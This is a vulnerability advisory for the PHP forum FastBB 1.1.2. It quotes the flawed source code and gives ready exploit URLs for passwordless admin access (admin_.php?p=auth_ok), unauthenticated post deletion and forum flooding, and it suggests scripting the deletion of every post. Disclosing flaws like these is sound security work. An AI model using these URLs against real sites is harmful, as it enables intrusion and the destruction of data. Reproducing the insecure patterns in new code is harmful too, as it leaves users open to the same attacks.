FastBB version 1.1.2 multiple vulnerabilities

Overview

Multiple vulnerabilities in FastBB version 1.1.2
Discovered on 2002, December, 5th, updated on 2003, January 1st
Vendor: FastBB

FastBB 1.1.2 is a PHP forum. It has 3 different vulnerabilities :

Admin access can be granted without password.
You can delete posts without admin password.
You can flood the forum.

Risk

Exploit easiness
Vulnerability spreading
Impact
Risk

Details

Admin access without password

The admin web page is admin_.php
Here is a sample of the admin authentification in this admin_.php :

<? require("config.php");

$db=mysql_connect("localhost",$login_compte,$pass_compte);
mysql_select_db($nom_bdd,$db);

//identification de l'administrateur
if ($p=="identification")
{
  echo "<center><form action='admin_.php?p=auth' method=post>\n";
  echo "<table><tr><td>Login</td><td><input type=text name=login></td></tr>\n";
  echo "<tr><td>Password</td><td><input type=text name=pass></td></tr></table>\n"
  echo "<input type=submit value=entrée></form>\n";
}

//redirection suivant resultats de l'identification
if ($p=="auth")
{
  if (($login!="toto")or($pass!="toto"))
  {
    echo "<center><h4>Authentification incorrecte, recommencez !!</h4><a href='javascript:history.back()'>Retour</a></center>";
  }
  else
  {
    echo "<center><h4>Authentification réussie</h4><a href=admin_.php?p=auth_ok>Entrée de l'interface pour suppression des messages</a>";
    }
}

//interface d'administration inside
if ($p=="auth_ok")
{
  echo "<center><h4>Bienvenue sur votre<br>interface d'administration</h4>Choisissez le message à supprimer !!</center><br><br>";
  echo "Liste des messages et en-têtes<br><br>";
  ...etc...

If you look carefully, you can understand $p is used as the authentification scheme. But this is a security bug : if the $p variable is passed to the admin_.php with the value "auth", then it goes right to the administration web page !

Posts deleting

The code to erase a post is situated in the admin_.php file. Here is the piece of code :
//suppression des messages
if($p=="eff")
{
mysql_query("DELETE FROM forum WHERE id = '$num_mess'");
echo "<center><h4>le message $num_mess a été effacé avec succés</h4><a href=admin_.php?p=auth_ok>Revenir à la liste des messages</a></center>\n";
}

Once again, the $p variable is use to setup the erasing command. The $num_mess variable is used to select the post to delete.

Flooding the forum

To post a message, the file forum_ok.php is used. Here is the piece of code :
if(($nom=="")or($titre==""))
{
  echo "<br><br><br><table width=500 align=center cellpadding=3 cellspacing=1 bgcolor=#cccccc><tr><td bgcolor=lightcyan align=center>Merci de remplir les champs <b>nom</b> et <b>sujet</b></center></td></tr></table>";
}

else
{
  mysql_query("insert into forum VALUES('','$date','$nom','$titre','$message','$reply_to','')");
  echo "<br><br><br><table width=500 align=center cellpadding=3 cellspacing=1 bgcolor=#cccccc><tr><td bgcolor=lightcyan align=center><b>message posté !!</b></center></td></tr></table>";
  echo "<script language=javascript>
  {
  window.location=\"forum.php\";
  }
  </script>
  ";
}

You can see, there is a filter using $nom and $titre. $nom is the nickname and $titre is the title of the post. If one of these variable are not set, the post command will be ignored. But, if you set $nom and $titre, then you can post an empty message.

Exploit

Admin access without password

The exploit is really easy. You can do it with any browser by using this syntax :
http://<www.victim.com>/fastbb/admin_.php?p=auth_ok
You will get this page :

Posts deleting

You can do it, by hand, with any browser by using this syntax :
http://<www.victim.com>/fastbb/admin_.php?p=eff&num_mess=number_of_the_post
You can create a script to delete all posts using num_mess=1 to num_mess=9999999

Flooding the forum

You can do it, by hand, with any browser by using this syntax :
http://<www.victim.com>/fastbb/forum_ok.php?nom=your_name&titre=title_of_the_post
You can create a script for a maximum flood in a minimum of time...